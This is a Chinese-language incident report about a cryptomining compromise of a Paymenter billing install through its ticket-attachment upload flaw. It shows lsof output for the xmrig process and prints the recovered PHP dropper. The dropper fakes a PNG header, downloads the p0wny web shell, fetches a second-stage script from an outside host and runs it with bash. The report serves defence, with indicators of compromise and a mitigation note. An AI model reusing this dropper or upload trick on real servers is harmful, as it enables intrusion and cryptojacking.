paymenter财务主机计费系统有上传漏洞
上半年装了一个体验一下，之后一直丢着没管，今天上去发现有挖矿进程。从下面的 lsof 输出可以看到，挖矿进程的工作目录、可执行文件以及它打开的 PHP 文件都在工单附件目录 ticket-attachments 下，说明恶意文件是通过附件上传进来并被执行的。
漏洞具体细节：https://cve.imfht.com/detail/CVE-2025-58048
root@localhost:/tmp# lsof -p 1479735
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
xmrig 1479735 paymenter cwd DIR 254,3 117 15784149 /home/paymenter/storage/app/public/ticket-attachments
xmrig 1479735 paymenter rtd DIR 254,3 298 128 /
xmrig 1479735 paymenter txt REG 254,3 8334576 15784153 /home/paymenter/storage/app/public/ticket-attachments/xmrig
xmrig 1479735 paymenter mem REG 254,3 561 3231722 /usr/share/zoneinfo/Asia/Shanghai
xmrig 1479735 paymenter mem REG 0,14 70684614 anon_inode:[io_uring] (stat: No such file or directory)
xmrig 1479735 paymenter 0r CHR 1,3 0t0 4 /dev/null
xmrig 1479735 paymenter 1w FIFO 0,13 0t0 70686037 pipe
xmrig 1479735 paymenter 2w FIFO 0,13 0t0 70685837 pipe
xmrig 1479735 paymenter 3u a_inode 0,14 0 1048 [eventpoll:9,11,13,14,15]
xmrig 1479735 paymenter 4u unix 0x00000000bd7e1641 0t0 26784 type=STREAM (CONNECTED)
xmrig 1479735 paymenter 5u a_inode 0,14 0 70684614 [io_uring]
xmrig 1479735 paymenter 6r REG 254,3 215 15784150 /home/paymenter/storage/app/public/ticket-attachments/XBrs38qG8DslCb8cOGWntcvNOceYQsu2AvFiQYDw.php
xmrig 1479735 paymenter 7r FIFO 0,13 0t0 70684615 pipe
xmrig 1479735 paymenter 8w FIFO 0,13 0t0 70684615 pipe
xmrig 1479735 paymenter 9r FIFO 0,13 0t0 70684616 pipe
xmrig 1479735 paymenter 10w FIFO 0,13 0t0 70684616 pipe
xmrig 1479735 paymenter 11u a_inode 0,14 0 1048 [eventfd:17]
xmrig 1479735 paymenter 12r CHR 1,3 0t0 4 /dev/null
xmrig 1479735 paymenter 13u a_inode 0,14 0 1048 [eventfd:25]
xmrig 1479735 paymenter 14u a_inode 0,14 0 1048 [eventfd:27]
xmrig 1479735 paymenter 15u IPv4 102158557 0t0 TCP XXXXXXX:53580->252.104.20.157.sg.kuroit.com:https (ESTABLISHED)
root@localhost:/tmp# cat /home/paymenter/storage/app/public/ticket-attachments/XBrs38qG8DslCb8cOGWntcvNOceYQsu2AvFiQYDw.php
@PNG
<?php
// Dropper recovered from the ticket-attachments upload directory. The lsof
// listing above ties it to the miner: the xmrig process has this file open on
// fd 6 and its cwd and executable in the same directory, running as the web
// user "paymenter".
// The "@PNG" line before the opening tag is literal output, not PHP; it is
// presumably a mangled PNG magic prefix (\x89PNG) intended to satisfy an
// image-type check on upload — confirm with a hex dump of the file.
// Stage 1: fetch a publicly available PHP web shell (p0wny-shell) into the
// current directory, i.e. the web-served attachments folder.
system("wget https://raw.githubusercontent.com/flozz/p0wny-shell/refs/heads/master/shell.php");
// Stage 2: fetch a second-stage script from an external host; treat the host
// and path as indicators of compromise when checking other installs.
system("wget https://bestvip.pt/storage/ticket-attachments/script.sh");
// Stage 3: execute it. No trailing ';' is needed because '?>' ends the
// statement. That this file ran at all indicates PHP was executable from the
// attachments directory — worth blocking there as a mitigation.
system("bash script.sh")
?>